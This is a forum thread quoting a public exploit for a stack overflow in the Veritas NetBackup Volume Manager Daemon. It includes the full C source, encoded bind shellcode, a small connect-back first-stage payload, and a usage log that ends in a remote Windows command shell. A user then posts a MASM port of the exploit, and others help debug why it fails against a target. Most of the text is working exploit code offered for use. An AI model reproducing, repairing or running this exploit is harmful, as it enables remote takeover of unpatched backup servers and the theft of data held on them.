/* DESCRIPTION Veritas NetBackup Stack Overflow (tcp/13701) "Volume Manager Daemon" Module Advisories http://www.idefense.com/intelligence/vulnerabilities/display.php?id=3 36 http://www.frsirt.com/english/advisories/2005/2349 USAGE C:\NetBackup>nb 192.168.0.2 4444 192.168.0.200 0 Veritas NetBackup v4/v5 "Volume Manager Daemon" Stack Overflow. Sending first buffer. Sending second buffer. C:\NetBackup>nc 192.168.0.200 4444 Microsoft Windows 2000 [versie 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:\WINNT\system32> INFORMATION I wrote this just for educational purposes . Because the buffer is only very small, I had to write small shellcode. The code is less than 100 bytes, and there are 6 bytes left. So there is still space to improve it. The stack seems to be static, every run at the exact same location. I used the Import Address Table (that looks like this): (taken from v5.1) Import Address Table 00447230 (send) 00447234 (recv) 00447238 (accept) 00447240 (listen) 0044724C (connect) 00447268 (closesocket) 00447284 (bind) 00447288 (socket) Using that shellcode I retrieve the "second" shellcode. This can be ANY code, and ANY size. No limitations. Tested on Windows 2000 Professional, Service Pack 4, Dutch. Tested on Veritas NetBackup 4.5, 5.0, 5.1 with some Maintenance Packs. (not all). Enjoy. 
*/ #include <winsock2.h> #include <stdio.h> #pragma comment(lib,"ws2_32") DWORD WINAPI SendShellcode(LPVOID lpParam); int iLocalOpenPort; /* win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com */ char szShellcode[] = "\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd2" "\x4a\xe7\xed\x83\xeb\xfc\xe2\xf4\x2e\x20\x0c\xa0\x3a\xb3\x18\x12" "\x2d\x2a\x6c\x81\xf6\x6e\x6c\xa8\xee\xc1\x9b\xe8\xaa\x4b\x08\x66" "\x9d\x52\x6c\xb2\xf2\x4b\x0c\xa4\x59\x7e\x6c\xec\x3c\x7b\x27\x74" "\x7e\xce\x27\x99\xd5\x8b\x2d\xe0\xd3\x88\x0c\x19\xe9\x1e\xc3\xc5" "\xa7\xaf\x6c\xb2\xf6\x4b\x0c\x8b\x59\x46\xac\x66\x8d\x56\xe6\x06" "\xd1\x66\x6c\x64\xbe\x6e\xfb\x8c\x11\x7b\x3c\x89\x59\x09\xd7\x66" "\x92\x46\x6c\x9d\xce\xe7\x6c\xad\xda\x14\x8f\x63\x9c\x44\x0b\xbd" "\x2d\x9c\x81\xbe\xb4\x22\xd4\xdf\xba\x3d\x94\xdf\x8d\x1e\x18\x3d" "\xba\x81\x0a\x11\xe9\x1a\x18\x3b\x8d\xc3\x02\x8b\x53\xa7\xef\xef" "\x87\x20\xe5\x12\x02\x22\x3e\xe4\x27\xe7\xb0\x12\x04\x19\xb4\xbe" "\x81\x19\xa4\xbe\x91\x19\x18\x3d\xb4\x22\xf6\xb1\xb4\x19\x6e\x0c" "\x47\x22\x43\xf7\xa2\x8d\xb0\x12\x04\x20\xf7\xbc\x87\xb5\x37\x85" "\x76\xe7\xc9\x04\x85\xb5\x31\xbe\x87\xb5\x37\x85\x37\x03\x61\xa4" "\x85\xb5\x31\xbd\x86\x1e\xb2\x12\x02\xd9\x8f\x0a\xab\x8c\x9e\xba" "\x2d\x9c\xb2\x12\x02\x2c\x8d\x89\xb4\x22\x84\x80\x5b\xaf\x8d\xbd" "\x8b\x63\x2b\x64\x35\x20\xa3\x64\x30\x7b\x27\x1e\x78\xb4\xa5\xc0" "\x2c\x08\xcb\x7e\x5f\x30\xdf\x46\x79\xe1\x8f\x9f\x2c\xf9\xf1\x12" "\xa7\x0e\x18\x3b\x89\x1d\xb5\xbc\x83\x1b\x8d\xec\x83\x1b\xb2\xbc" "\x2d\x9a\x8f\x40\x0b\x4f\x29\xbe\x2d\x9c\x8d\x12\x2d\x7d\x18\x3d" "\x59\x1d\x1b\x6e\x16\x2e\x18\x3b\x80\xb5\x37\x85\x22\xc0\xe3\xb2" "\x81\xb5\x31\x12\x02\x4a\xe7\xed"; char szBuffer[] = // We cannot use this small part. "a" "AAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAA" // Since the buffer is so small, we even need a part of // the SOCKADDR_IN structure. No problem. 
// struct sockaddr_in { "BB" // sin_family "BB" // sin_port "BBBB" // in_addr // "BBBBBBBB" // sin_zero // } // 'START' // Move the stackpointer. (0x0012F??? -> 0x0012F000) "\xC1\xEC\x0C" // SHR ESP, 0x0C "\xC1\xE4\x0C" // SHL ESP, 0x0C // Call socket(). "\x33\xDB" // XOR EBX, EBX "\x53" // PUSH EBX "\x43" // INC EBX "\x53" // PUSH EBX "\x43" // INC EBX "\x53" // PUSH EBX "\xBB\x88\x72\x44\x00" // MOV EBX, 447288 [socket()] "\xFF\x13" // JMP DWORD PTR [EBX] "\x8B\xF8" // MOV EDI, EAX // [edi -> socket] // Call connect(). "\x33\xDB" // XOR EBX, EBX "\xB3\x16" // MOV BL, 16 "\x53" // PUSH EBX "\xBB\x60\xF3\x12\x00" // MOV EBX, 12F360 "\x53" // PUSH EBX "\x57" // PUSH EDI "\xBB\x4C\x72\x44\x00" // MOV EBX, 44724C [connect()] "\xFF\x13" // JMP DWORD PTR [EBX] // We need space. "\x8B\xD4" // MOV EDX, ESP "\x80\xC6\x01" // ADD DH, 1 // Call recv(). "\x33\xDB" // XOR EBX, EBX "\x53" // PUSH EBX "\x43" // INC EBX "\xC1\xE3\x10" // SHL EBX, 8 [1 -> 65536] "\x53" // PUSH EBX "\x52" // PUSH EDX "\x57" // PUSH EDI "\xBB\x34\x72\x44\x00" // MOV EBX, 447234 [recv()] "\xFF\x13" // JMP DWORD PTR [EBX] // And again. "\x8B\xD4" // MOV EDX, ESP "\x80\xC6\x01" // ADD DH, 1 // Jump to our shellcode. "\xFF\xE2" // JMP EDX "O" "W" "N" "E" "D" "!" "\x68\xF3\x12\x00" // Here our code starts . "\x00\xF0\x12\x00"; // Just a random readable address. // This is the NOT-interesting part . DWORD main(int argc, char *argv[]) { printf("Veritas NetBackup v4/v5/v6 \"Volume Manager Daemon\" Stack Overflow.\n"); // We need a local port and ip because our first buffer is way too small // to contain our complete shellcode. We use a small shellcode first to // retrieve the second shellcode. The only method that fitted as first // shellcode was a connect-back shellcode. For the second we got LOADS of // space . 
if (argc<5) { printf("Usage: %s <local ip> <local port> <remote ip> <type>\n\n", argv[0]); printf("Types (tested):\n"); printf(" 0 - NetBackup v5.0_1A\n"); printf(" NetBackup v5.0_2\n"); printf(" NetBackup v5.0_3\n"); printf(" NetBackup v5.1\n\n"); return NULL; } WSADATA wsa; WSAStartup(MAKEWORD(2,0), &wsa); sockaddr_in strTarget; memset(&strTarget, 0, sizeof(strTarget)); strTarget.sin_addr.s_addr = inet_addr(argv[3]); strTarget.sin_family = AF_INET; strTarget.sin_port = htons(13701); iLocalOpenPort = atoi(argv[2]); HANDLE hStage2 = CreateThread(NULL, 0, SendShellcode, 0, 0, 0); SOCKET sTarget = socket(AF_INET, SOCK_STREAM, 0); int iResult = connect(sTarget, (struct sockaddr *)&strTarget, sizeof(strTarget)); if (iResult != SOCKET_ERROR) { printf("Sending first buffer.\n"); // Fill in the structure. unsigned long family = AF_INET; memcpy(szBuffer + 80, &family, 2); unsigned long port = htons(iLocalOpenPort); memcpy(szBuffer + 82, &port, 2); unsigned long ip = inet_addr(argv[1]); memcpy(szBuffer + 84, &ip, 4); send(sTarget, szBuffer, sizeof(szBuffer)-1, 0); closesocket(sTarget); } WaitForSingleObject(hStage2, 3000); WSACleanup(); return NULL; } DWORD WINAPI SendShellcode(LPVOID lpParam) { SOCKET sTarget; SOCKET sAccept; struct hostent *hp; struct sockaddr_in strTarget; struct sockaddr_in strAccept; int iStrSize = sizeof(strTarget); memset(&strTarget, 0, sizeof(strTarget)); strTarget.sin_addr.s_addr = INADDR_ANY; strTarget.sin_family = AF_INET; strTarget.sin_port = htons(iLocalOpenPort); sTarget = socket(AF_INET, SOCK_STREAM, 0); bind(sTarget, (struct sockaddr *)&strTarget, iStrSize); listen(sTarget, 2); sAccept = accept(sTarget, (struct sockaddr *)&strAccept, &iStrSize); if (sAccept != INVALID_SOCKET) { printf("Sending second buffer.\n"); send(sAccept, szShellcode, sizeof(szShellcode) - 1, 0); closesocket(sAccept); } return NULL; } // milw0rm.com [2006-01-16] ;=============================================================== Hey,all the above code has been translated 
into asm. The exe doesn't work. Please help me check it for mistakes. _40491904__rt_1.rar
.586 .model flat, stdcall option casemap :none ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>> include \masm32\include\windows.inc include \masm32\include\kernel32.inc include \masm32\include\Ws2_32.inc include \masm32\include\masm32.inc include \masm32\include\User32.inc include \masm32\include\debug.inc includelib \masm32\lib\User32.lib includelib \masm32\lib\kernel32.lib includelib \masm32\lib\Ws2_32.lib includelib \masm32\lib\masm32.lib includelib \masm32\lib\debug.lib include \masm32\macros\macros.asm ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>> .data? wsd WSADATA<?> strTarget sockaddr_in<?> strLocal sockaddr_in<?> iLocalOpenPort dd ? hStage2 dd ? sTarget dd ? ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>> .data szArgv1 db "100.160.1.99",0 szArgv2 db "4444",0 szArgv3 db "100.160.1.201",0 szArgv4 db "0",0 Msg1 db "Sending first buffer.",0 Msg2 db "Sending senond buffer.",0 szCaption db "Test",0 ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>> .code ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>> szShellcode db 43,201,131,233,176,217,238,217,116,36,244,91,129,115,19,210 db 74,231,237,131,235,252,226,244,46,32,12,160,58,179,24,18 db 45,42,108,129,246,110,108,168,238,193,155,232,170,75,08,102 db 157,82,108,178,242,75,12,164,89,126,108,236,60,123,39,116 db 126,206,39,153,213,139,45,224,211,136,12,25,233,30,195,197 db 167,175,108,178,246,75,12,139,89,70,172,102,141,86,230,06 db 209,102,108,100,190,110,251,140,17,123,60,137,89,9,215,102 db 146,70,108,157,206,231,108,173,218,20,143,99,156,68,11,189 db 45,156,129,190,180,34,212,223,186,61,148,223,141,30,24,61 db 186,129,10,17,233,26,24,59,141,195,02,139,83,167,239,239 db 135,32,229,18,02,34,62,228,39,231,176,18,04,25,180,190 db 129,25,164,190,145,25,24,61,180,34,246,177,180,25,110,12 db 71,34,67,247,162,141,176,18,04,32,247,188,135,181,55,133 db 
118,231,201,04,133,181,49,190,135,181,55,133,55,03,97,164 db 133,181,49,189,134,30,178,18,02,217,143,10,171,140,158,186 db 45,156,178,18,02,44,141,137,180,34,132,128,91,175,141,189 db 139,99,43,100,53,32,163,100,48,123,39,30,120,180,165,192 db 44,08,203,126,95,48,223,70,121,225,143,159,44,249,241,18 db 167,14,24,59,137,29,181,188,131,27,141,236,131,27,178,188 db 45,154,143,64,11,79,41,190,45,156,141,18,45,125,24,61 db 89,29,27,110,22,46,24,59,128,181,55,133,34,192,227,178 db 129,181,49,18,02,74,231,237 szBuffer db "a" db "AAAAAAAAAAAAAAAAAAAA" db "AAAAAAAAAAAAAAAAAAAA" db "AAAAAAAAAAAAAAAAAAAA" db "AAAAAAAAAAAAAAAAAAA" db "BB" db "BB" db "BBBB" db 193,236,12 db 193,228,12 db 51,219 db 83 db 67 db 83 db 67 db 83 db 187,136,114,68,00 db 255,19 db 139,248 db 51,219 db 179,22 db 83 db 187,96,243,18,00 db 83 db 87 db 187,76,114,68,00 db 255,19 db 139,212 db 128,198,01 db 51,219 db 83 db 67 db 193,227,16 db 83 db 82 db 87 db 187,52,114,68,00 db 255,19 db 139,212 db 128,198,01 db 255,226 db "O" db "W" db "N" db "E" db "D" db "!" 
db 104,243,18,00 db 00,240,18,00 ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>> memcopy_ proc uses edi esi ebx pDest:dword, pSource:dword, sizeDat:dword mov ecx, sizeDat mov esi, pSource mov edi, pDest mov eax, ecx shr ecx, 2 rep movsd mov ecx, eax and ecx, 3 rep movsb ret memcopy_ endp ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>> memset proc uses edi pDest:dword, chres:dword, sizeDat:dword mov ecx, sizeDat xor eax, eax mov edi, pDest mov edx, ecx shr ecx, 2 rep stosd mov ecx, edx and ecx, 3 rep stosb ret memset endp ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>> SendShellCode proc LOCAL sTarget1 : SOCKET LOCAL sAccept1 : SOCKET LOCAL strTarget1: sockaddr_in LOCAL strAccept1: sockaddr_in invoke memset, addr strTarget1, 0, sizeof strTarget1 mov strTarget1.sin_family, AF_INET mov strTarget1.sin_addr, INADDR_ANY invoke htons, iLocalOpenPort mov strTarget1.sin_port, ax invoke socket, AF_INET, SOCK_STREAM, 0 mov sTarget1,eax invoke bind, sTarget1, addr strTarget1, sizeof strTarget1 invoke listen,sTarget1,2 PrintHex sTarget1 invoke accept,sTarget1,addr strAccept1,sizeof strAccept1 mov sAccept1,eax PrintHex sAccept1 .if sAccept1 != INVALID_SOCKET invoke MessageBox,NULL,ADDR Msg2,ADDR szCaption,MB_OK invoke send,sAccept1,offset szShellcode, sizeof szShellcode - 1,0 invoke closesocket,sAccept1 .endif ret SendShellCode endp ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>> start: invoke WSAStartup, 202h, addr wsd invoke memset, addr strTarget, 0, sizeof strTarget mov strTarget.sin_family, AF_INET invoke inet_addr,addr szArgv3 mov strTarget.sin_addr, eax invoke htons, 13701 mov strTarget.sin_port, ax invoke a2dw,addr szArgv2 mov iLocalOpenPort,eax invoke CreateThread, 0, 0, addr SendShellCode, 0, 0, 0 mov hStage2,eax invoke socket, AF_INET, SOCK_STREAM, 0 mov sTarget,eax invoke connect, sTarget, addr strTarget, sizeof strTarget .if eax != 
SOCKET_ERROR invoke MessageBox,NULL,ADDR Msg1,ADDR szCaption,MB_OK mov strLocal.sin_family, AF_INET invoke memcopy_, szBuffer+80, addr strLocal.sin_family, 2 invoke htons, iLocalOpenPort mov strLocal.sin_port, ax invoke memcopy_, szBuffer+82, addr strLocal.sin_port, 2 invoke inet_addr,addr szArgv1 mov strLocal.sin_addr, eax invoke memcopy_, szBuffer+84, addr strLocal.sin_addr, 4 invoke send,sTarget,offset szBuffer, sizeof szBuffer - 1,0 invoke closesocket,sTarget .endif invoke WaitForSingleObject,hStage2,3000 invoke WSACleanup invoke ExitProcess, 0 ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>> end start ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>
You can compile your C code into an executable, then load it into OllyDbg and copy the asm listing from OllyDbg into your .asm file.
Hello, cresta. Thanks for the response. Borland C++ gives: [Linker Fatal Error] Fatal: Unable to open file 'WS2_32.OBJ'
;-------------------------------- push security_cookie call [ebp+@security_check_cookie] ;-------------------------------- the api help?
Hello, cresta ;=================================================== invoke accept,hTsock,addr strAccept,sizeof strAccept ;<=Error mov hAsock,eax PrintHex hAsock ;=================================================== The code in the first buffer doesn't work on the target PC. ASM LINK: \masm32\bin\Link /subsystem:windows /section:.text,ERW %name%.obj Is this correct?
Hello, Аноним. I used MS-VC to create the exe file, but the code doesn't work. Output: "Veritas NetBackup v4/v5/v6 "Volume Manager Daemon" Stack Overflow. Sending first buffer." I don't know why the second buffer isn't sent. Regards